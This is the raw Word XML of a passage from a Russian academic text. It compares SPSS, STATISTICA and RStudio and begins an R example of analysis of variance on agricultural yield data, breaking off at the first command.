    <w:p w14:paraId="78B20220" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E17DE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Есть интеграция с языками R и Python,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60086FCC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="000E17DE">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>Также система является масштабируемой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5CDC9" w14:textId="1E17D2A1" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t>Огромный минус этой программы – это то, что она является платной, также в ней нет инструментов многофакторного дисперсионного анализа.</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t xml:space="preserve"> Кроме того, эта программа недоступна к использованию в России.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA46857" w14:textId="618F52C2" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A806C0D" wp14:editId="17819720">
            <wp:extent cx="4200525" cy="2286000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Рисунок 17" descr="SPSS Statistics | IB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SPSS Statistics | IBM"/>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200525" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143C705" w14:textId="30BBA919" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид программы SPSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036D67E" w14:textId="664CCCFF" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t xml:space="preserve">Пакет STATISTICA разработан корпорацией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StatSoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Изначально пакет входил в качестве плагина в состав других известных в то время электронных таблиц Lotus 1-2-3. В 1991 году программа стала самостоятельным продуктом. Последняя версия приложения была совместима только с Vista, в ней есть GUI и инструмент динамического обмена данными, что позволяет работать пакету с другими Windows</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">приложениями. В последние версии дистрибутива также включен язык программирования </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Statistica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – Basic. Программа занимает на диске всего 18 Мб и требует всего 4 Мб ОЗУ. Возможности этой программы поистине всеобъемлющие: она может строить уравнение регрессии и делать </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">вычисления по описательным статистикам. Также </w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t xml:space="preserve">в свое время </w:t>
      </w:r>
      <w:r>
        <w:t>облада</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>ла</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> привлекательным пользовательским интерфейсом. Также в программе встроен очень удобный модуль подсказок, который позволяет обучаться в процессе исследования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF8B26" w14:textId="5C04974F" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBDF96C" wp14:editId="2F75FA00">
            <wp:extent cx="4152900" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="Рисунок 18" descr="https://studbooks.net/imag_/15/214978/image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https://studbooks.net/imag_/15/214978/image002.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152900" cy="3114675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F19EF71" w14:textId="4B23AC95" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид программы STATISTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0103BC90" w14:textId="5D9D482F" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t>Файлы представляют собой электронные таблицы, похожие на Excel файлы. Файл содержит переменные и наблюдения. Переменные</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>это как поля в базе данных, а наблюдения как записи. Пакет STATISTICA обладает очень удобным графическим интерфейсом, тоже</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как в Excel, позволяя делать множественное выделение, перемещение и организацию всплывающего меню по правому клику мыши.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765931E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:r>
        <w:t>Общее число переменных в файле не может быть больше 4092, а количество наблюдений может быть сколько угодно, также программа позволяет проводить импорт и экспорт данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74751A" w14:textId="77777777" w:rsidR="007B6474" w:rsidRDefault="0093378B" w:rsidP="007B6474">
      <w:r>
        <w:t>Минусом этого статистического пакета является то, что программа давно не обновляется и является морально и визуально устаревшей на сегодняшний день, но её неоспоримое преимущество – это импорт данных из Excel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2392CDA1" w14:textId="785A1684" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Одним из наиболее популярных статистических пакетов в мире является R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Studio</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и язык </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>. R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Studio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – это программа для вычислений, созданная исследователями для обработки и анализа данных, работы с графикой и математического моделирования. Функционал</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE25A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>языка R достаточно велик: его можно использовать просто</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t xml:space="preserve"> как</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> калькулятор, можно обрабатывать данные в табличном виде, еще можно проводить статистические исследования, например узнать p</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>уровень значимости, провести дисперсионный или регрессионный анализ. Также можно проводить более сложные вычисления, строить тепловые карты и графики. Также немаловажным преимуществом этой программы является кроссплатформенность. R – это продукт со свободной лицензией</w:t>
      </w:r>
      <w:r w:rsidR="00C454F4">
        <w:t>, но существует вероятность того, что данный продукт может быть заблокирован на территории России</w:t>
      </w:r>
      <w:r>
        <w:t>. Также R является самостоятельным языком программирования</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="001F04F3">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="001F04F3">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="001F04F3">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E75475" w14:textId="77777777" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713708B3" wp14:editId="6755A63F">
            <wp:extent cx="5048250" cy="3371850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="Рисунок 16" descr="https://samoedd.com/wp-content/uploads/2016/01/Rgui_sm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s://samoedd.com/wp-content/uploads/2016/01/Rgui_small.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048250" cy="3371850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FE479" w14:textId="5BBC52CE" w:rsidR="007B6474" w:rsidRPr="00AE25A7" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40717D33" w14:textId="13812F18" w:rsidR="00823137" w:rsidRDefault="007B6474" w:rsidP="00A86ECB">
      <w:r>
        <w:t>На сегодняшний день существует очень много качественных статистических пакетов, среди которых самыми лучшими являются</w:t>
      </w:r>
      <w:r w:rsidR="002620AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SPSS и SAS. Но </w:t>
      </w:r>
      <w:r w:rsidR="0040023D">
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2013 год</w:t>
      </w:r>
      <w:r w:rsidR="0040023D">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, несмотря на высочайшую конкуренцию, язык R стал </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">самой используемой программой для статистического исследования в научных публикациях. Достоинство языка R – это его </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>кросплатформенность</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, бесплатная лицензия, и большой репозиторий пакетов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61BB67" w14:textId="58AD1703" w:rsidR="0093378B" w:rsidRDefault="007B6474" w:rsidP="00A86ECB">
      <w:r>
        <w:t xml:space="preserve">Но для того, чтобы работать с языком </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в программе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">необходимо знание самого языка программирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>общего принципа работы языков программирования (объекты, массивы, списки, функции, циклы и т.д.), данный факт требует от исследователя высокой квалификации в области компьютерных наук</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Также для того, чтобы обеспечить автоматическую загрузку данных из БД, необходимо знать, как связать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с базой</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t xml:space="preserve"> данных</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чтобы реализовать подобную функцию</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от исследователя требуются знания в области администрирования операционных систем</w:t>
      </w:r>
      <w:r w:rsidR="004F5C8D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и знания теории баз данных</w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и отдельного языка запросов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007B6474">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>что также требует высокой квалификации пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3DF308" w14:textId="0395E18F" w:rsidR="00A86ECB" w:rsidRPr="00A86ECB" w:rsidRDefault="00A86ECB" w:rsidP="00A86ECB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы продемонстрировать как статистика, и, в частности, дисперсионный анализ может быть полезен в сельскохозяйственных исследованиях, далее представлен пример проведения одно- и многофакторного анализа в среде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86ECB">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">на языке программирования </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86ECB">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F59D3" w14:textId="3A6E48EA" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D1599B">
      <w:r w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve">Язык программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> обладает огромным инструментарием</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для проведения статистических исследований, собственно, он и позиционируется как язык программирования для статистиков. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29638125" w14:textId="248748A1" w:rsidR="00A76471" w:rsidRDefault="00A76471" w:rsidP="00D1599B">
      <w:r>
        <w:t xml:space="preserve">Графическая оболочка в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1599B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>разделена на 4 области:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05D3C9" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D1599B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="OLE_LINK1"/>
      <w:r>
        <w:t xml:space="preserve">область кода, где пользователь пишет инструкции к выполнению и затем последовательно их выполняет, также он может сохранить этот файл с расширением </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1599B">
        <w:t>*.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, чтобы потом заново открыть написанный код;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:p w14:paraId="0C9AA196" w14:textId="12AA501C" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D1599B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">область консоли и терминала. В консоли можно тоже выполнять инструкции, но они не будут сохранены в файл скрипта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1599B">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>также в консоли выводится информация о выполненных командах</w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:lastRenderedPageBreak/>
        <w:t>Н</w:t>
      </w:r>
      <w:r>
        <w:t>апример</w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> когда пользователь устанавливает библиотеку</w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в консоли выводится информация о загрузке, или когда пользователь выполняет инструкцию по выполнению описательных статистик для своих данных, в консоль выводится таблица с описательными статистиками (среднее, медиана, количество наблюдений, первый и третий квартиль и т.д.). В терминале пользователь может открыть командную строку своего компьютера, например </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1599B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для выполнения других функций, связанных с операционной системой или другой программой;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335A99F" w14:textId="0AB8C8D2" w:rsidR="0093378B" w:rsidRDefault="00A76471" w:rsidP="00D1599B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="0093378B">
        <w:t>бласть окружения. В этой области отображаются переменные, которые объявил пользователь в своей сессии, их можно раскрыть и посмотреть информацию о содержимом списков и таблиц, также в этой области можно посмотреть историю выполнения команд;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB90018" w14:textId="0AD8BF88" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D1599B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>область графиков, пакетов и окно помощи. В этой области отображаются графики такие как</w:t>
      </w:r>
      <w:r w:rsidRPr="00267F12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">гистограммы, </w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:t>ящики с усами</w:t>
      </w:r>
      <w:r w:rsidR="00A76471">
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и уравнения регрессии, эти графики можно экспортировать в виде изображений на свой жёсткий диск. В окне пакетов отображаются все пакеты и библиотеки, которые можно установить, установленные пакеты помечаются галочками. Пакеты и библиотеки – это наборы дополнительных инструментов для проведений исследований, например библиотека графиков </w:t>
      </w:r>
      <w:r w:rsidRPr="00267F12">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ggplot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00267F12">
        <w:t xml:space="preserve">2” </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">нужна, если стандартные инструменты визуализации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00267F12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">не подходят. Окно помощи – это инструмент для поиска документации и примеров использования инструкций. В этом окне можно найти описание для всех функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00267F12">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40456F90" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00267F12">
      <w:r>
        <w:t xml:space="preserve">В рамках текущего исследования будет рассмотрен функционал языка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>проведения дисперсионного анализа. Далее приведен пример проведения анализа на данных, где есть 3 фактора и одна зависимая переменная-отклик.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5AECB" w14:textId="4829BF5C" w:rsidR="0093378B" w:rsidRDefault="00BA1029" w:rsidP="00F47B32">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A3C0805" wp14:editId="1AC30F2C">
            <wp:extent cx="3429000" cy="5543550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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29000" cy="5543550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9F8687" w14:textId="738D75C2" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F47B32">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">таблица с данными, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>density</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– фактор с 2 уровнями; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">фактор с 4 уровнями; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fertilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">фактор с 3 уровнями, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yield</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47B32">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>переменная-отклик</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8A848" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F47B32">
      <w:r>
        <w:t xml:space="preserve">Для начала необходимо произвести описательные статистики командой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
